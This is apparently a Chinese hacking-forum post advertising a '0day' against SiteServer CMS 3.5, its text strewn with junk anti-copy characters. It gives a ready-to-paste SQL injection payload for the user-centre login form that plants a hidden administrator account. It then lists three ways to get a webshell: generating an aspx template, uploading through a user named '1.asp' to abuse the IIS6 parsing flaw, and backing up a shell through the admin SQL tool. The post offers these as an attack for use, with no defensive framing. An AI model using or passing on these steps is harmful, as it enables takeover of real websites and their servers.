SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn



2 _3 c! m% l1 M+ A1 I2 q# l0 ]( DEXP:
) ?9 U% r3 P/ r3 p9 x8 v* E
直接访问UserCenter/login.aspx


* ^* p+ |1 n% E7 {9 A
- f: F& h, r9 `9 B- n2 Q用户名处输入：

  r5 Y  a6 S7 C. |$ Z123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

7 R& q$ Y0 l) I3 c  `# J

( z& `3 o4 G' X+ R, U7 Y: T密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
2 c' O2 H. i+ O* N


# K7 g: W0 O0 x8 B" q5 t之后再访问后台SiteServer/login.aspx用插入的用户登陆
5 Q' z  d& n) [& v& u5 `
! E$ H  ]: _  _! a/ G
) ]4 S6 u# {0 L9 W3 z' `7 _
后台拿webshell的三种方法：

. i' f7 k8 y5 f: D一、
: E* D  L1 d2 E; n  v7 b9 ~& Z4 y
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
5 U8 \7 j* K7 _8 @6 M( \
成员权限-》添加用户-》用户名为：1.asp
. T/ Z3 P6 W1 |- W3 y  F4 z
6 D" q) G6 g6 x" Phttp://127.0.0.1/usercenter/
2 o1 P. ^+ ]3 D9 ~- C, U
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
4 Z: c! P! D. ~7 |
（ps：后台添加用户时不会验证是否含有非法字符）
% j5 l5 X& Q0 l4 k# u+ S0 G3 _
三、

" B: M- U2 V4 |3 E' w系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
  a5 R+ J/ X8 O% z* e. t1 N9 S# c
  e+ I" w0 m+ X: z系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# U" M4 m5 T0 l. M$ n3 r+ n( M6 ~. `" M